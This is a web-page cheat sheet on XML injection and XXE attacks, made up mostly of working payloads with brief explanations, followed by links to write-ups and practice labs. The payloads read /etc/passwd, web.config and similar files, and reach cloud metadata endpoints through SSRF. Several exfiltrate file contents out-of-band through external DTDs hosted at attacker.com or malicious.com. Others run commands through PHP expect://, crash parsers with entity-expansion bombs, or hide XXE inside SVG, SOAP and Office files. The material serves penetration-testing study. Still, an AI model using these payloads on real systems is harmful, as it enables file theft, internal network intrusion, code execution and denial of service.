XML Injection
XML (Extensible Markup Language) is a way to structure and transfer data between systems. It is similar to JSON, but older and more verbose. Web apps often use XML to communicate with databases, APIs, or other services Now, XML Injection happens when a web app doesn’t properly validate or sanitize XML input, letting attackers sneak in malicious XML data.
This can lead to data leaks, authentication bypasses, or even full system compromise. For example, suppose an app processes user-supplied XML without checks. In that case, an attacker can inject custom XML tags to manipulate queries, extract hidden data, or even trigger XXE (XML External Entity) attacks—which can expose internal files or allow server-side request forgery (SSRF).
- XML Injection = Messing with XML data to break an app’s logic and security
Detecting XML External Entity (XXE) Vulnerability
An XML External Entity attack occurs when an XML parser processes external entities defined in a DTD (Document Type Definition). This allows attackers to read local files, perform SSRF (Server-Side Request Forgery), or execute remote code. Internal Entity Usage (Safe)
<!-- Internal entity declaration --> <!DOCTYPE safeExample [<!ENTITY example "Doe"> ]><userInfo> <firstName>John</firstName> <lastName>&example;</lastName> </userInfo>
External Entity Exploitation (Vulnerable to XXE)
<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <userInfo><firstName>John</firstName> <lastName>&xxe;</lastName> </userInfo>
SSRF Attack via XXE
<!DOCTYPE attack [ <!ENTITY xxe SYSTEM "http://attacker.com/malicious"> ]> <userInfo><firstName>John</firstName> <lastName>&xxe;</lastName> </userInfo>
XXE Exploitation Techniques
Extracting sensitive files like /etc/passwd (Linux) or C:\boot.ini (Windows).
<?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY test SYSTEM 'file:///etc/passwd'> ]><root>&test;</root><?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM"file:///c:/boot.ini"> ]> <foo>&xxe;</foo>
OOB XXE (Out-of-Band Exfiltration)
If direct file output is blocked, attackers can send it to an external server.
<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
evil.dtd file on the attacker’s server
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % all "<!ENTITY send SYSTEM'http://attacker.com/log?%file;'>"> %all;
[Blind XXE(http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) (Triggering Requests Without Response) Used when responses are not reflected but requests are processed.
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://attacker.com/log"> ]> <root>&xxe;</root>
Using expect:// for Remote Code Execution (PHP-Specific)
If PHP’s expect:// wrapper is enabled, commands can be executed.
<!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "expect://id"> ]> <foo>&xxe;</foo>
Classic XXE - Reading Local Files
Used to read system files like /etc/passwd on Linux or C:\boot.ini on Windows. Linux:
<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Windows:
<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///c:/boot.ini">]><foo>&xxe;</foo>
Base64 Encoding for Evasion
If the direct file output is blocked, encoding the response in Base64 helps bypass restrictions. Retrieves /etc/passwd in Base64, making detection harder.
<!DOCTYPE test [ <!ENTITY % init SYSTEM"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]> <foo/>
PHP Wrapper - Extracting Source Code
The php://filter wrapper allows attackers to base64-encode and extract PHP source code. Extracts index.php and encodes it in Base64, useful for code analysis.
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><contacts><contact><name>Jean &xxe; Dupont</name></contact></contacts>
SSRF via XXE
Extracts AWS instance metadata, leading to cloud infrastructure compromise.
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><foo>&xxe;</foo>
[OOB XXE](Out-of-Band Exploitation)
Impact: Data is sent to an external server (attacker.com), bypassing security controls.
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://attacker.com/log?data=file:///etc/passwd">]><foo>&xxe;</foo>
Exploiting Public Identifiers
Requests an external payload, allowing remote file inclusion.
<!DOCTYPE foo PUBLIC "Random Text" "http://attacker.com/payload.xml"><foo>&xxe;</foo>
XInclude Attacks
When you can't modify the DOCTYPE element, you can use XInclude to target local files or internal resources. XInclude allows XML documents to include content from external sources, making it a useful vector for exploiting XXE vulnerabilities.
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text"href="file:///etc/passwd"/> </foo><foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text"href="file:///C:/Windows/win.ini"/> </foo><foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text"href="http://malicious.com/payload.xml"/> </foo>
Exploiting XXE to Perform SSRF Attacks
XXE (XML External Entity) vulnerabilities can be combined with SSRF (Server-Side Request Forgery) to access internal services and extract sensitive information.
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" >]><foo>&xxe;</foo><?xml version="1.0"?><!DOCTYPE data [<!ENTITY % remote SYSTEM "http://internal.service/admin">%remote;]><data>&remote;</data><?xml version="1.0"?><!DOCTYPE test [<!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">67%payload;]><test>&payload;</test>
Exploiting XXE to Perform a Denial of Service (DoS)
These attacks can crash services or entire servers. Do not use them in production environments.
Quadratic Blowup Attack
Unlike the Billion Laughs attack, this payload exploits XML parsers by repeating a large entity, causing extreme processing delays and memory consumption.
<!DOCTYPE data [<!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"><!ENTITY y "&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;">]><data>&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;&y;</data>
YAML Recursive Reference Bomb
This YAML payload exploits cyclic references, causing infinite recursion when parsed, leading to excessive memory usage.
x: &xy: *xa: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
Deeply Nested XML Bomb
This attack uses deep recursion instead of entity expansion, forcing the XML parser to exceed stack depth limits.
<data><item><item><item><item><item><item><item><item><item><item>Deep recursion attack!</item></item></item></item></item></item></item></item></item></item></data>
Billion Laugh Attack
<!DOCTYPE data [<!ENTITY a0 "dos" ><!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"><!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"><!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"><!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">]><data>&a4;</data>
Parameters Laugh Attack
A variant of the Billion Laughs attack, this technique leverages delayed interpretation of parameter entities, causing excessive memory consumption and processing delays in XML parsers.
<!DOCTYPE r [<!ENTITY % pe_1 "<!---->"><!ENTITY % pe_2 "%pe_1;<!---->%pe_1;"><!ENTITY % pe_3 "%pe_2;<!---->%pe_2;"><!ENTITY % pe_4 "%pe_3;<!---->%pe_3;">%pe_4;]><r/>
Exploiting Error-Based XXE
Error-based XML External Entity (XXE) attacks rely on forcing the application to disclose error messages, which can leak sensitive file contents or system information.
Using Local DTD for Error-Based Exfiltration
If error-based exfiltration is possible, a local DTD file can be used for concatenation tricks, confirming if error messages expose file names.
<!DOCTYPE root [<!ENTITY % local_dtd SYSTEM "file:///abcxyz/">%local_dtd;]><root></root>
Advanced Error-Based XXE: Reading File Contents via Error Messages
By referencing a non-existent entity inside a local DTD, attackers can trick the XML parser into leaking parts of a file through error messages.
<!DOCTYPE root [<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % int "<!ENTITY exfil SYSTEM 'file:///nonexistent/%file;'>">%int;]><root>&exfil;</root>
Error-Based XXE via OOB (Out-Of-Band) Exfiltration
If error messages do not disclose enough information, but DNS or HTTP requests are allowed, file contents can be exfiltrated using an external DTD.
<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://attacker.com/malicious.dtd">%ext;]><root></root>
List DTDs and generate XXE payloads using those local DTDs.
Linux Local DTD Exploitation
A list of existing DTD files in Linux can be found locate .dtd, fonts.dtd file contains an injectable entity %constant at line 148, making it a potential attack vector.
/usr/share/xml/fontconfig/fonts.dtd/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd/usr/share/xml/svg/svg10.dtd/usr/share/xml/svg/svg11.dtd/usr/share/yelp/dtd/docbookx.dtd
Local File Disclosure (Linux)
This payload leverages fonts.dtd to exfiltrate the contents of /etc/passwd Reads sensitive files (/etc/passwd, .bash_history, .ssh/id_rsa). Stores file contents in /tmp/leak/, where it can be retrieved later.
<!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"><!ENTITY % constant 'aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM'file:///tmp/leak/%file;'>">%eval;%error;<!ELEMENT aa (bb'>%local_dtd;]><message>Text</message>
Windows Local DTD Exploitation
Common Windows local DTD files that can be abused
C:\Windows\System32\wbem\xml\cim20.dtd
Local File Disclosure (Windows)
Uses cim20.dtd to read sensitive files (web.config, php.ini).
<!DOCTYPE doc [<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"><!ENTITY % SuperClass '><!ENTITY % file SYSTEM "file://D:\webserv2\services\web.config"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM'file://t/#%file;'>">%eval;%error;<!ENTITY test "test"'>%local_dtd;]><xxx>anything</xxx>
Triggering the XXE Vulnerability
XXE payload fetches a malicious remote DTD from attacker.com The SYSTEM keyword loads an external DTD. If the parser supports external entities, ext.dtd will be processed.
<?xml version="1.0" ?><!DOCTYPE message [<!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">%ext;]><message></message>
Malicious DTD Content - Extracting /etc/passwd
1: Using an Error-Based Technique Defines an entity %file to read /etc/passwd. Defines %eval, which creates another entity (%error). Triggers an error by requesting a nonexistent file, appending /etc/passwd content. If the application includes error messages in HTTP responses, the file contents leak.
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
2: Alternative Exfiltration via URL Encoding
%data; loads /etc/passwd.%eval; builds a new entity %leak;.%leak; references the leaked file content in the error message.<!ENTITY % data SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % leak SYSTEM '%data;:///'>">%eval;%leak;
Blind XXE - Exfiltrating Data Out of Band (OOB)
When an application does not return XML parsing errors or output, Out-of-Band (OOB) XXE can be used to extract data.If the application is vulnerable, it will make a request to burpcollaborator.net, confirming XXE exploitation potential
Basic Blind XXE with Burp Collaborator
To detect blind XXE, try requesting an external resource (e.g., Burp Collaborator)
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % ext SYSTEM"http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x">%ext;]><r></r>
Exfiltrating /etc/passwd via HTTP Request
%xxe reads /etc/passwd.%callhome; sends the first line of /etc/passwd to www.malicious.com.<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY % xxe SYSTEM "file:///etc/passwd"><!ENTITY callhome SYSTEM "http://www.malicious.com/?%xxe;">]><foo>&callhome;</foo>
OOB XXE Attack (Yunusov, 2013)
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"><data>&send;</data>
Remote DTD File (parameterEntity_oob.dtd)
The external DTD loads file:///sys/power/image_size.
%send; sends its content to publicServer.com.<!ENTITY % file SYSTEM "file:///sys/power/image_size"><!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">%all;
XXE OOB with PHP Filters
Bypassing direct file access using PHP’s base64 encoding
<?xml version="1.0" ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">%sp;%param1;]><r>&exfil;</r>
Malicious DTD File (dtd.xml)
php://filter encodes /etc/passwd in base64.
%exfil; sends it to 127.0.0.1/dtd.xml.<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
Apache Karaf CVE-2018-11788 XXE OOB Vulnerable Apache Karaf versions: ≤ 4.2.1 ≤ 4.1.6
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com">%dtd;]><features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0http://karaf.apache.org/xmlns/features/v1.3.0"><feature name="deployer" version="2.0" install="auto"></feature></features>
WAF Bypasses and XXE Exploitation Techniques
XML parsers use four methods to detect encoding:
- HTTP Content-Type
Content-Type: text/xml; charset=utf-8
- Reading Byte Order Mark (BOM)
UTF-8: 3C 3F 78 6DUTF-16BE: 00 3C 00 3FUTF-16LE: 3C 00 3F 001
- XML Declaration:
<?xml version="1.0" encoding="UTF-8"?>
XXE Exploitation Techniques
application/json- {"search":"name","value":"test"}application/xml- <?xml version="1.0" encoding="UTF-8" ?><root><search>name</search><value>data</value></root>{ "errors":{ "errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity." } }
XXE Inside Exotic Files
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"width="300" version="1.1" height="200"> <image xlink:href="expect://ls" width="200"height="200"></image> </svg>
Classic Exploit
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Out-of-Band (OOB) XXE via SVG Rasterization
<?xml version="1.0" standalone="yes"?><!DOCTYPE svg [<!ELEMENT svg ANY ><!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">%sp;%param1;]><svg viewBox="0 0 200 200" version="1.2" xmlns="http://www.w3.org/2000/svg" style="fill:red"><text x="15" y="100" style="fill:black">XXE via SVG rasterization</text></svg>
XXE Inside SOAP
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
XXE Inside Office Files
Inject XXE payload into .xml files within a .docx:
/word/document.xml/ppt/presentation.xml/xl/workbook.xml/_rels/.rels[Content_Types].xmlUpdate the ZIP filezip -u xxe.docx [Content_Types].xml
Tool XXE in XLSX
7z x -oXXE xxe.xlsxcd XXEzip -u ../xxe.xlsx *
Inject Payload in xl/workbook.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM"http://x.x.x.x:8000/xxe.dtd">%asd;%c;]><cdl>&rrr;</cdl>Or inject in xl/sharedStrings.xml<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM"http://x.x.x.x:8000/xxe.dtd">%asd;%c;]><sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10"uniqueCount="10"><si><t>&rrr;</t></si></sst>
Write-ups
- A Deep Dive into XXE Injection
- Automating local DTD discovery for XXE exploitation
- Blind OOB XXE At UBER 26+ Domains Hacked
- CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server
- Data exfiltration using XXE on a hardened server
- Detecting and exploiting XXE in SAML Interfaces
- Exploiting XXE in file upload functionality
- EXPLOITING XXE WITH EXCEL
- Exploiting XXE with local DTD files
- From blind XXE to root-level file read access
- How we got read access on Google’s production servers
- Midnight Sun CTF 2019 Quals
- OOB XXE through SAML
- Payloads for Cisco and Citrix
- Pentest XXE
- Playing with Content-Type – XXE on JSON Endpoints
- REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS
- XML attacks
- XML external entity (XXE) injection
- XML External Entity (XXE) Processing
- XXE in Uber to read local files
- XXE inside SVG - YEO QUAN YANG
- XXE: How to become a Jedi
Cheatsheet
- XXE ALL THE THINGS!!!
- XXE payloads
- PayloadsAllTheThings
- XML External Entity (XXE) Injection Payload List
Labs
- Root Me - XML External Entity
- PortSwigger Labs for XXE
- Exploiting XXE using external entities to retrieve files
- Exploiting XXE to perform SSRF attacks
- Blind XXE with out-of-band interaction
- Blind XXE with out-of-band interaction via XML parameter entities
- Exploiting blind XXE to exfiltrate data using a malicious external DTD
- Exploiting blind XXE to retrieve data via error messages
- Exploiting XInclude to retrieve files
- Exploiting XXE via image file upload
- Exploiting XXE to retrieve data by repurposing a local DTD
- GoSecure workshop - Advanced XXE Exploitation